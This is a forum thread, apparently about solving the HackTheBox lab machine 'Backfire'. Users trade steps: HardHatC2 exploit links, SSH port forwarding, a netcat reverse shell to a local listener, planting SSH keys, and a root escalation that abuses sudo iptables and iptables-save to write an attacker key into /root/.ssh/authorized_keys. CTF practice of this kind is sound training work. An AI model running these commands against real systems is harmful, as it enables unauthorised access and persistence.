[Zer0Gr2vity]

[quote="RmF4b3VpbGxl" pid='1028385' dateline='1737293512']
[quote="ent0xE" pid='1028376' dateline='1737293169']
[quote="RmF4b3VpbGxl" pid='1028358' dateline='1737292178']
[quote="ent0xE" pid='1028131' dateline='1737281424']
For Root from ilya:
Follow this Guide: vuln 2 and 3:
https://blog.sth.sh/hardhatc2-0-days-rce...88a6815c08

From sergej to root, follow this guide:
https://www.shielder.com/blog/2024/09/a-...scalation/

#add rule
sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 YOURSSHKEY\n'

#verify with:
sudo iptables -S

#save into authorized_keys
sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys

#login
ssh -i key root@backfire.htb

bro i forwaded both ports but still got this error when visitin the site (Secure Connection Faile) can u show me ur port forwording command or a solution to this problem

[Steward]

I am having trouble keeping the shell alive long enough to enumerate the box to find the ssh keys. Is that how everyone is port forwarding? Or are they doing something else?

There are not any to find. You must add

if you have added just share because m tired of
ilya@10.x.x.x: Permission denied (publickey)

I have added it

tell how to ?

may be you add pub key with comment. you need to add just keys without comment.
you also can rewrite or add new sudoer file instead of adding authorized SSH key.
you can set sergej as sudoer and switch root inside the terminal

[RmF4b3VpbGxl]

For Root from ilya:
Follow this Guide: vuln 2 and 3:
https://blog.sth.sh/hardhatc2-0-days-rce...88a6815c08

From sergej to root, follow this guide:
https://www.shielder.com/blog/2024/09/a-...scalation/

#add rule
sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 YOURSSHKEY\n'

#verify with:
sudo iptables -S

#save into authorized_keys
sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys

#login
ssh -i key root@backfire.htb

Succesfully exploit Vuln 2 as ilya, but cant get the vuln3 to work, could you help ? I cant find where I can use the user claim from vuln 2

Make sure when you ran the exploit script from vuln 2, that the user "sth_pentest" was created, you need portfwd via SSH (5000/7096) to your box for that. When the user was created login under https://127.0.0.1:7096 (don't need the jwt token) and the endpoint where you get code execution is https://127.0.0.1:7096/ImplantInteract. Add an SSH-Key for easy access like:

echo 'ssh-ed25519 SSHKEY' > /home/.ssh/sergej/authorized_keys

When executed, vuln2 created user pfapostol.
But how am I supposed to log in without password

the only password you need is the password to login C2, after that all SSH connections go using SSH keys

I got ssh access to ilya, next step I executed vuln 2 that create the account, now I am in front of HardHat C2 login page

[Zer0Gr2vity]

I got ssh access to ilya, next step I executed vuln 2 that create the account, now I am in front of HardHat C2 login page
[/quote]

how did u get acces to hardhat c2 for god sake my portforwarding isnot woking

[Steward]

Succesfully exploit Vuln 2 as ilya, but cant get the vuln3 to work, could you help ? I cant find where I can use the user claim from vuln 2

Make sure when you ran the exploit script from vuln 2, that the user "sth_pentest" was created, you need portfwd via SSH (5000/7096) to your box for that. When the user was created login under https://127.0.0.1:7096 (don't need the jwt token) and the endpoint where you get code execution is https://127.0.0.1:7096/ImplantInteract. Add an SSH-Key for easy access like:

echo 'ssh-ed25519 SSHKEY' > /home/.ssh/sergej/authorized_keys

When executed, vuln2 created user pfapostol.
But how am I supposed to log in without password

the only password you need is the password to login C2, after that all SSH connections go using SSH keys

I got ssh access to ilya, next step I executed vuln 2 that create the account, now I am in front of HardHat C2 login page

login there as this user and go to Interact then Terminal then click +

In your ilya shell start a listener
nc -nvlp 1234

and run a bash revshell in 7096 terminal
nc 127.0.0.1 1234 -e /bin/bash

and u will get shell as sergej

[RmF4b3VpbGxl]

Make sure when you ran the exploit script from vuln 2, that the user "sth_pentest" was created, you need portfwd via SSH (5000/7096) to your box for that. When the user was created login under https://127.0.0.1:7096 (don't need the jwt token) and the endpoint where you get code execution is https://127.0.0.1:7096/ImplantInteract. Add an SSH-Key for easy access like:

echo 'ssh-ed25519 SSHKEY' > /home/.ssh/sergej/authorized_keys

When executed, vuln2 created user pfapostol.
But how am I supposed to log in without password

the only password you need is the password to login C2, after that all SSH connections go using SSH keys

I got ssh access to ilya, next step I executed vuln 2 that create the account, now I am in front of HardHat C2 login page

login there as this user and go to Interact then Terminal then click +

In your ilya shell start a listener
nc -nvlp 1234

and run a bash revshell in 7096 terminal
nc 127.0.0.1 1234 -e /bin/bash

and u will get shell as sergej

As the user created by the vuln ? Or from creds we got in initial files ? Futhermore, it looks like I cant type in the login form :/

[Steward]

I got ssh access to ilya, next step I executed vuln 2 that create the account, now I am in front of HardHat C2 login page

how did u get acces to hardhat c2 for god sake my portforwarding isnot woking
[/quote]

command to port forward:

* Switch SSH shell first

ilya@backfire:~/Havoc/payloads/Demon$ cat ~/.ssh/id_rsa

on your Kali

root@kali:~/htb# chmod 600 ilya_id_rsa

port forward for port 5000  using this sintax

root@kali:~/htb# ssh -L 5000:127.0.0.1:5000 -i ilya_id_rsa ilya@10.10.11.49

and port 7096 using this:
root@kali:~/htb# ssh -L 7096:127.0.0.1:7096-i ilya_id_rsa ilya@10.10.11.49

---

When executed, vuln2 created user pfapostol.
But how am I supposed to log in without password

the only password you need is the password to login C2, after that all SSH connections go using SSH keys

I got ssh access to ilya, next step I executed vuln 2 that create the account, now I am in front of HardHat C2 login page

login there as this user and go to Interact then Terminal then click +

In your ilya shell start a listener
nc -nvlp 1234

and run a bash revshell in 7096 terminal
nc 127.0.0.1 1234 -e /bin/bash

and u will get shell as sergej

As the user created by the vuln ? Or from creds we got in initial files ? Futhermore, it looks like I cant type in the login form :/

user from exploit. you must be able to type login and pass. if not hence something wrong with browser.
after port forward you login https://127.0.0.1:7096 and will be able to type login and pass in login form.

[Aditya]

how to get the root shell

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[Zer0Gr2vity]

how to get the root shell

https://www.shielder.com/blog/2024/09/a-...scalation/

[Zer0Gr2vity]

how to get the root shell

https://www.shielder.com/blog/2024/09/a-...scalation/

its giving me permission error

u shouldnt follow the same to rewrite /etc/passwd u should write the authorized_keys in root directory to add ur pub key then connect with ur key